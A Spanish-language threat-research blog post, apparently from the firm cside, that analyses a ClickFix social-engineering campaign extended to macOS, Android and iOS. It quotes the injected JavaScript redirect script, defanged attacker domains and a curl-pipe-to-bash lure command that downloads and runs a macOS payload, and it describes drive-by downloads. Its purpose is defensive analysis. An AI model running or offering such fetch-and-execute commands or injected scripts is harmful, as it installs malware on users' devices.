Lo que comenzó como un truco de ingeniería social centrado en Windows se ha convertido en una amenaza multiplataforma del lado del cliente. En este artículo, desglosamos una variante reciente de ClickFix que ahora apunta a macOS, Android e iOS, utilizando redirecciones basadas en navegador, mensajes de interfaz de usuario falsos e incluso técnicas de descarga no autorizada.
¿Qué es un ataque ClickFix?
Los ataques ClickFix no son nuevos. Mi primer encuentro con uno fue en Septiembre 2024:
Un ataque ClickFix es una forma de ingeniería social dirigida o ataque del lado del cliente que explota el instinto del usuario de "simplemente solucionar el problema". Por lo general, comienza con un mensaje convincente que apunta a un supuesto problema (como una vulnerabilidad de seguridad o un problema de repositorio). Se insta al usuario a hacer clic en un enlace o ejecutar un comando, creyendo que está resolviendo algo importante.
En este ejemplo de ataque, se solicita al usuario que ejecute un script en la terminal. En Windows, eso significaba PowerShell. Naturalmente, la misma técnica también funciona en macOS y Linux. Y al igual que con Windows, supuse que los usuarios no caerían en la trampa.
Sin embargo, las suposiciones son un juego peligroso en la ciberseguridad, lo que lamentablemente se ha demostrado una vez más.
Somos cside y monitoreamos los ataques de scripts de terceros del lado del cliente y mejoramos la protección del lado del cliente en tiempo real para los sitios web y sus usuarios. Sólo en los últimos tres meses, hemos observado más de 300.000 sitios web comprometidos.
Curiosamente, esta es la segunda vez que damos la noticia de que los atacantes han evolucionado sus TTP (Tácticas, Técnicas y Procedimientos).
Pero lo que alguna vez fue una amenaza exclusiva de Windows, ahora apunta también a otros sistemas operativos.
El ataque en detalle
Recibimos una alerta para JavaScript descargado de:
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16El guión entregado:
(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();
Este JavaScript no está muy ofuscado, lo cual es poco común en este tipo de ataques. Crea un controlador de clics para elementos con un nombre de clase específico que abre una URL en una nueva pestaña cuando se hace clic. Esto es lo que hace:
- Toma una URL de plantilla (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Reemplaza {KEYWORD} con el título de la página procesada
- Adjunta controladores de clic a todos los elementos con la clase buttonPress-16
- Al hacer clic, estos elementos abren la URL construida en una nueva pestaña.
A continuación se muestra la cadena de redireccionamiento:
Cadena de redireccionamiento en la interfaz de usuario
La página aparece como un acortador de URL y le pide al usuario que copie un enlace. Los atacantes están abusando de cutt[.]ly, un acortador de URL legítimo.
Cuando un usuario pega la URL acortada en el navegador, este lo redirige a:
Esta página de acortador de URL imitada muestra la siguiente ventana emergente:
"Pegue el enlace que copió en la línea de dirección del navegador".
Luego redirige al usuario a una página de descarga (en este caso para macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
El contenido de este archivo de shell es el siguiente en esta captura de pantalla:
Este script de shell luego descarga un ejecutable de macOS (detectado por 10 motores antivirus en VirusTotal).
Comportamiento de Android e iOS
Cuando probamos esto en Android e iOS, esperábamos una variante ClickFix. Pero en lugar de eso, nos encontramos con un ataque desde un vehículo.
Un ataque drive-by es un tipo de ciberataque en el que se ejecuta o descarga código malicioso en un dispositivo simplemente visitando una página web comprometida o maliciosa. No se requieren clics, instalaciones ni interacción.
La página ahora nos redirigió a:
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Este sitio descargó un archivo .tar. 7zip protegido con contraseña - que extrajo y eliminó el malware (detectado por 5 motores antivirus). Y detectado por 5 proveedores en VirusTotal.
Detectado por 5 proveedores el VirusTotal.
Tanto en el sistema operativo Android como en Windows, se utilizó este estilo de ataque desde vehículos.
Se trata de un ataque fascinante y en evolución que demuestra cómo los atacantes están ampliando su alcance. Lo que comenzó como una campaña ClickFix específica de Windows ahora está dirigida a macOS, Android e iOS. Ampliando significativamente la escala de la operación.
Es otro recordatorio más de cómo los ataques del lado del cliente se están extendiendo enormemente y de las diversas formas que pueden adoptar, todo ello aprovechando la confianza que los usuarios depositan en las interacciones del navegador cuando la seguridad del lado del cliente es deficiente o no se aplica correctamente.
